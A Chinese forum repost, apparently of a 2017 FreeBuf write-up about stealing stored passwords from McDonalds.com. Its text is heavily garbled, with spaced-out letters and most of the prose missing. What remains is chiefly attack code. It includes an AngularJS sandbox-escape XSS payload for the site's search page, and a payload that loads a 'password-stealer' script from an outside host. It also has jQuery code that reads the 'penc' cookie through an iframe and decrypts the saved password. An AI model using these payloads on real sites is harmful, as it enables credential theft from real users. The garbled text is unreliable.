搜索

[10943] 2017-01-18_看我如何利用漏洞窃取麦当劳网站注册用户密码

文档创建者:s7ckTeam
浏览次数:100
最后更新:2025-01-18
2017-01-18_看我如何利用漏洞窃取麦当劳网站注册用户密码 c l o u d s   F r e e B u f   2 0 1 7 - 0 1 - 1 8 I n s e c u r e _ C r y p t o g r a p h i c _ S t o r a g e X S S M c D o n a l d s . c o m P O C - X S S A n g u l a r J S M c D o n a l d s . c o m X S S q * * * * * * * * * * * - t e s t - r e f l e c t e d - t e s t - * * * * * * * * * * * h t t p s : / / w w w . m c d o n a l d s . c o m / u s / e n - u s / s e a r c h - r e s u l t s . h t m l ? q = * * * * * * * * * * * - t e s t - r e f l e c t e d - t e s t - * * * * * * * * * * *
A n g u l a r J S 使 q { { $ i d } } A n g u l a r J S I D 9 L i n k   u s e d :   h t t p s : / / w w w . m c d o n a l d s . c o m / u s / e n - u s / s e a r c h - r e s u l t s . h t m l ? q = { { $ i d } } A n g u l a r J S J a v a S c r i p t 1 + 2 = { { 1 + 2 } } 1 + 2 = 3 A n g u l a r x s s A n g u l a r J S 使 { { a l e r t ( 1 ) } } A n g u l a r J S   A n g u l a r J S 1 . 6 P o r t S w i g g e r A n g u l a r J S M c D o n a l d s . c o m 使 A n g u l a r J S a n g u l a r . v e r s i o n A n g u l a r J S 1 . 5 . 3 P o r t S w i g g e r { { x   =   { ' y ' : ' ' . c o n s t r u c t o r . p r o t o t y p e } ;   x [ ' y ' ] . c h a r A t = [ ] . j o i n ; $ e v a l ( ' x = a l e r t ( 1 ) ' ) ; } }
J S { { x   =   { ' y ' : ' ' . c o n s t r u c t o r . p r o t o t y p e } ;   x [ ' y ' ] . c h a r A t = [ ] . j o i n ; $ e v a l ( ' x = $ . g e t S c r i p t ( ` h t t p s : / / f i n n w e a . c o m / s n i p p e t s / e x t e r n a l - a l e r t . j s ` ) ' ) ; } } `   C o n t e n t - S e c u r i t y - P o l i c y R e m e m b e r   m y   p a s s w o r d
p a s s o w r d , C o o k i e p e n c C o o k i e p e n c L O L !
使 J a v a s c r i p t C r y p t o J S 3 D E S k e y i v c o o k i e A n g u l a r J S c h a r A t j o i n c h a r A t = [ ] . j o i n ; $ e v a l ( x = a l e r t ( 1 ) ) 使 c o o k i e g e t C o o k i e c h a r A t ( 0 )   g e t C o o k i e c o o k i e A n g u l a r J S w i n d o w . x s s I s E x e c u t e d i f   ( ! w i n d o w . x s s I s E x e c u t e d )   {         w i n d o w . x s s I s E x e c u t e d   =   t r u e ;         v a r   i f r a m e   =   $ ( ' < i f r a m e   s r c = " h t t p s : / / w w w . m c d o n a l d s . c o m / u s / e n - u s . h t m l " > < / i f r a m e > ' ) ;         $ ( ' b o d y ' ) . a p p e n d ( i f r a m e ) ;         i f r a m e . o n ( ' l o a d ' ,   f u n c t i o n ( )   {                 v a r   p e n c   =   i f r a m e [ 0 ] . c o n t e n t W i n d o w . g e t C o o k i e ( ' p e n c ' ) ;                 a l e r t ( i f r a m e [ 0 ] . c o n t e n t W i n d o w . d e c r y p t ( p e n c ) ) ;         } ) ; } A n g u l a r J S c o o k i e { { x   =   { ' y ' : ' ' . c o n s t r u c t o r . p r o t o t y p e } ;   x [ ' y ' ] . c h a r A t = [ ] . j o i n ; $ e v a l ( ' x = $ . g e t S c r i p t ( ` h t t p s : / / f i n n w e a . c o m / s n i p p e t s / m c d o n a l d s - p a s s w o r d - s t e a l e r . j s ` ) ' ) ; } } @ # % & !  
* * f i n n w e a . c o m F B c l o u d s F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理